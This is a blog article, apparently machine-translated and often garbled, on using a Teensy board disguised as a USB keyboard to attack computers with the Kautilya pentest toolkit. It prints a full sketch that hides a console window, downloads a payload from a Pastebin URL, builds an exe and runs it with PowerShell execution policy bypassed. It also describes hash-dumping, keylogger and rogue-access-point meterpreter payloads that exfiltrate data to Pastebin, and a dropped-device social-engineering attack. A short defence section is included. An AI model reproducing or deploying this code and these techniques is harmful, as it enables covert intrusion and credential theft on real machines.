Flattr this!


In modern operating systems, there is an interesting feature – they have complete trust in devices such as a keyboard or mouse. Accordingly, if you build the device, which will emulate the desired input, and connect it to your computer, you can do anything.

WARNING:The information is provided solely for educational purposes. Any use in improper purpose may be punished according to the law. Neither the author nor the wording in this case are not liable.

A small example

I’ll start with a small demonstration. Imagine: a security specialist conducts an internal pentest in a company and sees that one of the staff often leaves the station unlocked. The obvious way – to step up and do some “evil” commands until no one is looking. However, there is a serious risk of being caught by a stranger workplace but still gaining something strange in the black console window :). And if the researcher has a device that you connect itself to gaining pre-programmed instructions? Come and discreetly insert such a device – not too much trouble. Or another example. Let the attacker be the one who does not have physical access to computers. If they mask  the device disguised as a mouse, flash drives or 3G-modem, then there’s a chance it without much help from someone it is inserted by employees. There are cases where such Soup just sent through the mail as souvenirs. Percentage of users who are unaware of the trick, connect the device to a computer, is quite high. However, neither the system nor, for example, anti-virus notice the trick – for them it is a normal keyboard. Why is this happening?


First you need to understand the concept of Human Interface Device, or HID. In Wikipedia states that HID – type of computing device that communicates directly with a person, the most frequently receives input from a person, and provides the output data him. The most common types of HID-devices – is the keyboard, mouse, and joystick. From the point of view of a computer system HID-devices are fully trusted and generally regarded as a simple interface between the user and the machine.When you insert into the new computer keyboard and mouse, no you did not ask permission to install them, and the drivers are usually installed automatically. Such boundless confidence can go sideways for the user and has long been noted by experts on information security. Back in 2010 at the DEFCON hacker conference notorious Irongeek and Dave ReL1k talked in detail about how to use HID-device for checking safety systems. Since then, the term of protection has not changed anything. And collect the device, which under the guise of the keyboard will perform the programmed actions, there is nothing stopping now and what I learned as part of my research.

Teensy board

The basis for such USB-device was chosen board Teensy + + 2.0. This is a programmable microcontroller, which originally comes with a full USB-port. Among the examples of Teensy, gathered in large numbers on the official site, – LED-T-shirt, which is using the diode displays a different image, a machine for drawing a marker at the target for the picture you want on any flat surface, RFID-card reader, motion detection, and dozens of uses. You must have heard about the Arduino and its analogues, and so Teensy – a very similar project. But what is important for my task: to Teensy extremely easy to implement a HID-device, which will be determined by the system as a keyboard or, for example, a mouse. Since the board was originally equipped with a USB-port, I did not even pick up a soldering iron and make any hardcore intervention. All that was needed – to write a correct program. Note that the board has several versions, but I chose the most expensive and heaped – Teensy + + 2.0. It can be ordered on the official website of the project pjrc.com only $24.

Restrictions in Teensy

There is one aspect that complicates the Teensy life. Because we use HID-device emulation, we can say with the system, but we can not hear it. This is the main limitation when writing peyload for Teensy, which makes peyloady less sensitive to the state of the system. The developer will have to combat loads to determine in advance all possible situations and the system’s response, because at the time of the system’s response will be impossible. The only thing that can read Teensy, when used as a keyboard – a state of the buttons CAPS, NUM and SCROLL. Another limitation is the small size of the memory device, but you can live with, especially when connected to a Teensy additional storage medium, such as SD-card.

Hello world

Teensy, as the board Arduino, uses a similar processor Atmel AVR, so you can take the same development environment – Arduino Development Environment (arduino.cc ), it is also called ADE. Last freely available for all popular operating systems (Windows, Linux, Mac OS X) and, in addition to editing the code, the program allows you to pour into the microcontroller. To make full use of it to work with Teensy, you must also install additional addon Teensyduino ( pjrc.com / teensy / teensyduino.html ). Superstructure, in particular, provides the ability to immediately translate Teensy to emulate the keyboard: it is done in ADE menu «Tools -> Boards -> USB Keyboard». If you insert the device into the computer, he immediately identified as Claudia. However, nothing will happen – as long as nothing is programmed.


The development environment with the Arduino Development Environment plugin installed for compatibility with Teensy

What is the program or, as it is called in the local terminology, a sketch for a Teensy? Development is carried out using C like syntax. Programmer available variables, methods, conditional statements, pointers – in short, everything you need for happiness. Any sketch must contain a function setup () and loop (): the first is called once during startup, and the second in a series performs code written inside it.Functions can even be empty, but must be present – otherwise the compilation will end in failure. Here is a simple example of code:

int count = 0;
void setup () {} 
void loop () {
  Keyboard.print ("Hello World");
  delay (5000);

As you can see, I used to emulate a ready function Keyboard.print (). Moreover, the entry will be repeated, because the call is made ??from the function loop (). The delay implemented with delay (), need to repeat I do not happen too quickly. The documentation describes in detail the more complex cases of emulation and keyboard, and mouse, and joystick – I’m on this description of the programming Teensy finish. In the course of my research I have already made ??all the necessary sketches, you may need pentester and issued them as a ready set of tools Kautilya (code.google.com / P / Kautilya ), which is available open source for everyone.

Kautilya toolkit

In the course of lectures on the Teensy, I noticed that very often pentesters do not have the time to program the microcontroller to fit your needs. As a result, they simply refuse from the tool. I decided to simplify the task and wrote a Ruby script, asking some parameters and output an outstanding finished sketch, which can be downloaded in the Teensy. With this supply the microcontroller can combat load without any knowledge of how to write software for the microcontroller.


Kautilya management toolkit through the console menu

To better understand what is sewn inside Kautilya, propose to consider, as it looked pentest Windows 7 machine using HID-device, if it were necessary to start from scratch. Most likely, it would be the following steps:

  1. Identify the operating system from the viewpoint of USB-buffer.
  2. Find out the supported commands and learn to use them to implement the needed actions in the system using PowerShell-and / or VBS-scripts.
  3. Identify security mechanisms built (such as UAC and politics run PowerShell-scripts) that can verify privileged commands, and then find a way to get around them.
  4. Find out the time it takes the OS to perform various commands.
  5. Record commands and scripts on board Teensy.
  6. To find out what tricks can throw the command line when Teensy will send commands (emulate keyboard input) on the victim’s machine.
  7. Try to be as inconspicuous as possible on the victim’s computer.
  8. Peyload test and make a final sketch.
  9. Compile the sketch and fill in for the Teensy.
  10. Connect the device to the victim’s machine or make it so that it did it myself (for example, through social engineering).
  11. Get the result :).

The next few lines might look like self-promotion ;). Kautilya automates the steps one through eight. In other words, using the toolkit researcher enough:

  1. Select from the console menu Kautilya ready combat load and specify the options – as a result will generate a finished sketch (*. Ino or *. Pde file).
  2. Pour the sketch to the board Teensy.
  3. Connect the device to a target machine.
  4. Enjoy the victory!

At the moment the toolkit contains peyload for Windows 7 and Linux (tested on Ubuntu 11.4). Not to be unfounded, I propose to examine some of them and see how they work, if the victim’s machine using Windows 7.


Create a sketch dump of user passwords

Is there a way to protect?

I see two basic ways to protect against these attacks on Windows-based systems:

  1. Prevent installation of removable devices – it can be done through group policy (gpedit.msc) for the local machine, and for the workstations in the domain. If you go to “Administrative Templates -> System -> Device Installation -> Device Installation Restrictions”, then you’ll see the various settings for device installation restrictions. I would recommend to enable the “Prevent installation of removable devices”, then no device connected to the system will no longer be. In addition, smoking will update drivers for already installed devices. Install the new device will only be able administrator, and even then only after activating the option “Allow administrators to replace the policy of restricting the installation.”Keep in mind, if we are talking about the organization, then it will certainly turn into a nightmare for users who do not find the usual Plug’n’Play, once tortured admin requests to see their computer. What to do?
  2. Act radically and prevent physical access to the USB-port. Unfortunately, most often this is not possible – a big company will always be a loophole. Some motherboard manufacturers claim that their security solutions are able to block such malicious devices (including on the basis of collected Teensy). But I would strongly recommend not to trust such statements: I tested here a defense, and it was useless little more than full.


Prohibit the installation of external devices to prevent attacks via USB-devices

Examples of use

Payload: download and run

As I said, the combat load is selected via the console menu Kautilya. One simple peyloadov – Download and Execute, which loads the file from the Internet and run it on the target system. Of course, when creating the program for the microcontroller to indicate where the file should take. Interestingly, for hosting binaries offered to place it at the service Pastebin.com, pre-treating it to be stored in clear text, and the corresponding conversion is useful for special script exetotext.ps1, which is in the folder Kautilya / extras. At the time of execution on the victim machine downloads a text file, converts it back into an executable exe and runs it in the background. This may be a windows reverse meterpreter (in fact, the reverse shell) if you connect a device with such a sketch to the test computer, pentester very soon get meterpreter-session. The load is able to bypass the execution policy and does not display any windows on the target computer.

It is interesting to consider that still generates Kautilya. Here is the script below, explaining the important moments of a few comments:

void setup () {
   delay (5000);
   / / Delay of 5 seconds is required to Windows 7 prepared to work with the device

   run ("cmd / T: 01 / K \" @ echo off && mode con: COLS = 15 LINES = 1 && title Installing Drivers \ "");
   / / Open the console window is very small in size with the heading Installing Drivers

   delay (3000);

   Keyboard.println ("echo $ webclient = New-Object System.Net.WebClient>% temp% \ \ download.ps1");
   / / Create an object of the WebClient class

   Keyboard.println ("echo $ url = \" http://pastebin.com/raw.php?i=NfiBdUp9 \ ">>% temp% \ \ download.ps1");
   / / Pastebin URL in raw-format that was passed as an option Katuilya

   Keyboard.println ("echo [string] $ hex = $ webClient.DownloadString ($ url) >>% temp% \ \ download.ps1");
   / / Load text to hex-format

  Keyboard.println ("echo [Byte []] $ temp = $ hex-split '' >>% temp% \ \ download.ps1");
   / / To translate hex bytes

   Keyboard.println ("echo [System.IO.File] :: WriteAllBytes (\"% TEMP% \ \ payload.exe \ ", $ temp) >>% temp% \ \ download.ps1");
   / / Write the resulting bytes to exe-file

   Keyboard.println ("echo start-process-nonewwindow \"% TEMP% \ \ payload.exe \ ">>% temp% \ \ download.ps1");
   / / Behind the scenes carry payload.exe

   delay (2000);

   Keyboard.println ("echo Set oShell = CreateObject (\" WScript.Shell \ ")>% temp% \ \ download.vbs");

   Keyboard.println ("echo oShell.Run (\" powershell.exe-ExecutionPolicy Bypass-noLogo-command% temp% \ \ download.ps1 \ "), 0, true >>% temp% \ \ download.vbs");
   / / Execute PowerShell-script of vbs, which bypasses the execution policy and does not display any windows on the victim

   delay (1000);

   Keyboard.println ("wscript% temp% \ \ download.vbs");

   delay (3000);

   Keyboard.println ("exit");
   / / Close the terminal window

void loop () {
   / / Loop-function is necessary to sketch

void run (char * SomeCommand) {
   Keyboard.set_modifier (MODIFIERKEY_RIGHT_GUI); 
   / / Emulates pressing the Windows key

   Keyboard.set_key1 (KEY_R);
   / / Emulates pressing <R>

   Keyboard.send_now ();
   / / Send key combination <Windows> + <R>, which opens the "Run" 

   delay (1500);
   Keyboard.set_modifier (0);
   / / Emulates the key release <Windows>

   Keyboard.set_key1 (0);
   / / Emulates the key release <R>

   Keyboard.send_now ();
   / / Release the <Windows> and <R>

   Keyboard.print (SomeCommand);
   / / Enter the argument passed SomeCommand in the "Run"
   Keyboard.set_key1 (KEY_ENTER);

   Keyboard.send_now ();

   Keyboard.set_key1 (0);

   Keyboard.send_now ();

Once again, I will explain: this generated script is immediately ready for download via the Teensy development environment Arduino Development Environment.

Payload: dump password hashes

Another payload can be used to dump password hashes from the Windows 7 machine. In order for it to apply, the researcher must first download the script powerdump meterpreter of metasploit on Pastebin, where it will later be downloaded to the victim. As you know, this script works only with the privileges of SYSTEM, which can be obtained by adding to the standard task scheduler. However, this good old trick will only work under the administrator account. To transfer the data, sketch again uses the service Pastebin, but did not disclose the hashes for all in a row – instead, he published them in the form of a private post (not accessible to outsiders.) True, it is first necessary to register with the service and get your developer key (api developer key), which is a sketch will be used to publish the data.Username / password and key to Pastebin, as well as the name of the task scheduler – all this, of course, ask Kautilya when creating the program for Teensy. If you pour the resulting sketch and inserted into a computer user who works as an administrator, then Pastebin.com very soon be user password hashes, which are often Brutus.


Payload: keylogger

There are loads of military and keylogger, which is a PowerShell-script that saves the captured keystrokes to a private post on Pastebin. Publication takes place after a certain period of time. However, in their incomprehensible format. To put the data into an understandable form, you must use a script parsekeys.ps1, which is in the folder Kautilya / extras. For the successful execution of the script, all data on Pastebin should be stored in a file data.txt. Upon completion of work, he will create a file Logged_keys.txt, containing data about keystrokes in a readable form. Such a simple keylogger is capable of storing the data entered into web forms and text fields of applications.

Payload: creating fake web access point

This unusual peyload normal use of Windows 7 to create a hotspot and raises an access point on the target machine by running meterpreter bind shell. Accordingly, if successful pentester can connect to a wireless network set up and get to the shell (this scenario, by the way, just look exotic, but in fact can be very effective.) Shell runs in RAM and therefore invisible (thank Matt for him to exploit-monday.com). To create a program for Teensy, the researcher must first generate a bind meterpreter peyload using the commands from the file extras \ payloadgen.txt, and then copy the generated stress in the file src \ rogue_ap.txt. When creating a program Kautilya request SSID for the access point, the key to connect to a wireless network, and port (for example, 4444), in which the connection will be made. If the load succeeds, and the wireless network will rise, then connect to it, you can go to the settings and see the default gateway – this is the address of the target computer. The researcher can connect to port 4444, using the msf listener, and – bingo! – Get meterpreter-session.You may be wondering a little bit, because in the built-in Windows firewall idea was to block the connection. But if you will look at the source code generated by the sketch, you will see that your peyload Kautilya added to the list of exceptions to the standard Windows firewall.

Payload: the collection of information

The set is peyload toolkit and gather valuable information. In the standard variation of the program with a special PowerShell-script and registry extracts the list of active users, PowerShell-environment, trusted hosts PuTTY, saved sessions PuTTY, a list of shared resources cars, environment variables, the list of installed applications, the domain name, the contents of hosts-file list running services, account policy, local users, local groups and information on the WLAN. The data obtained, as usual, are stored on Pastebin in a private post.

Life example

The question that I always ask: “Are all of these can be useful in a penetration test?” Yes. I would like to share a story of one pentest. I performed a penetration test for a major Indian financial services company. It was a test of the “black box” that is, I was raised in terms of the attacker without access to anything. The company’s servers, accessible from the Internet, are adequately protected, and there was no fault to anything. What is not clear. Then I went to their office and told the guards at the entrance, I found several mice and flash drives, which have dropped from any employee of the bag. All units have been protroyaneny Teensy and contained various peyloady. Half an hour later I got the first shell (most likely, it was a computer in the guard room.) By the end of the day I already had local administrator privileges on many computers – apparently, the guards handed over the device in the IT-department. Protroyanennyh of 90% of devices were connected to at least one system, while 70% have successfully completed peyload placed within them. The client, a security vbuhat lot of money, was very surprised and impressed with this way of penetration. Now this hole they covered. What do I mean? As long as the operating system and the protective mechanisms of trust HID-devices that use them as a vector of attack will not be a problem for intruders. However, such methods of attack are still many security specialists are not considered serious. And for good reason.